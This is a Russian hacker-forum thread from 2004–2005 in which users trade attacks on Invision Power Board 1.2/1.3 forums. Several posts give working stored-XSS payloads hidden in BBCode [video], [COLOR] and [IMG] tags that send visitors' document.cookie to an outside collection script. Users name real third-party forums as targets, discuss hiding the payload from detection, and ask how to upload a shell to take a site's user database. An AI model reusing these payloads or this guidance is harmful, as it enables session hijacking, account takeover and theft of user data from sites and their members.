Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос про уязвимости в Invision Power Board(U) v1.3 Final (https://forum.antichat.xyz/showthread.php?t=4527)

Майор 20.12.2004 01:37
Вопрос про уязвимости в Invision Power Board(U) v1.3 Final
 
Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
Русский Модифицированный IPB v1.3 Final © 2003 BesTFileZ.Net & IBR Team


На таких форумах баги есть ???
надо вытащиьт пароль юзера (хоть в хэше)

(-=util=-) 30.12.2004 05:02
Ура! я нашёл эту тему у вас.... мне хотелось бы найти информацию по этой версии... хоть чтонибуть. спасибо.

Майор 30.12.2004 13:58
Давече в логах снифера видел куки с такоко форома ...
Обыскался куда туда можно вставить скрипт снифера ... не нашёл ... подскажите кто знает ...

bad_boy 30.12.2004 15:58
2 Майор
А где это форум???
Ссылку дай!

Майор 30.12.2004 16:35
из того форума скрипт потёрли сразу ...
но вот ещё один :
http://offklan.lamkam.net/forum/index.php?showtopic=26 (на этой стронице скрипт)

вот пост :
<!-- THE POST 152 -->
<div class='postcolor'> <embed width="400" height="300" src=http://1.ru e=` type="application/x-shockwave-video">` style=display:none;background:url(javascript:docum ent.images[12].src=&quot;http://antichat.ru/cgi-bin/s.jpg?&quot;+document.cookie) <i>А</i> если я буду писать раз в неделю нормально будет ? </div>
<!-- THE POST -->
ща буду разбираться ..... , кстате объясните кто знает, что значит символ "`" в html (мне кажется что это что то типо "goto" в С++ ) ???

Майор 30.12.2004 18:27
Вот так выглядит скрипт :

[video]http://1.ru e=` [/video]` style=display:none;background:url(javascript:docum ent.images[10].src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie) No smoking

"No smoking" - в место это текст
Если в 10 кодировке зделать, то ваще без палева :)

(-=util=-) 30.12.2004 21:31
Это значит что форум взломан =))) молодец чувак! Уважуха!

(-=util=-) 30.12.2004 22:06
вот только не навсех пашет =\... почему? уже пропатчены? версия таже... хмммм...

(-=util=-) 30.12.2004 22:22
Например тут непашет =\ http://www.overdose.ru/forum/index.php

Майор 30.12.2004 23:10
Цитата:
Сообщение от (-=util=-)
Например тут непашет =\ http://www.overdose.ru/forum/index.php
Там просто отключены теги вставления видео, картинок в пост, причём в некоторых форумах кнопка на тегу [video] убрана, но она работает...

(-=util=-) 31.12.2004 00:06
всё я просёк на каких пашет. Должнабыть приписка


MyBoard 1.3.0.9.142 © 2004 Elvis271 & 3DT


я же пользовался вот так:

[video]http://1.ru e=`[/video]` style=display:none;background:url(javascript:docum ent.images[12].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)

bad_boy 11.01.2005 11:07
Блин, нада уязвимость на IPB 1.3.1 Final Rus
Ничё из нета ненадыбал. Всё пропатчено. Походу идеальный форум, но таких ведь небывает!!! Кто чё знает хелп плиз

Fargus 12.01.2005 08:55
Является одним из самых защищенных форумов на сегодняшний день. Багов в 1.3.1 я сам не видел, и в нете постов тоже не замечал. Поэтому и юзаю этот форум =)

x_Lex 14.01.2005 07:20
Ревята срочно нужна помащ в
Код:
Powered by Invision Power Board(U) v1.2 © 2003  IPS, Inc.
Русский Модифицированный IPB v1.2 © 2003 BesTFileZ.Net
эта бага сработала на ура (к стате респест Algol`у за находку)
PHP код:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) [/COLOR] 
вот толко форум там мёртвый так что куки админа хрен даждешся , а мне их база розарез нужна. ножет подскажите как туда шелл залить

>>ElvI$<< 14.01.2005 10:42
Никак,если ты не имеешь кеша админа или модера.

Майор 14.01.2005 14:20
Цитата:
Сообщение от >>ElvI$<<
Никак,если ты не имеешь кеша админа или модера.
А как модератор шел залить может ?


Время: 02:33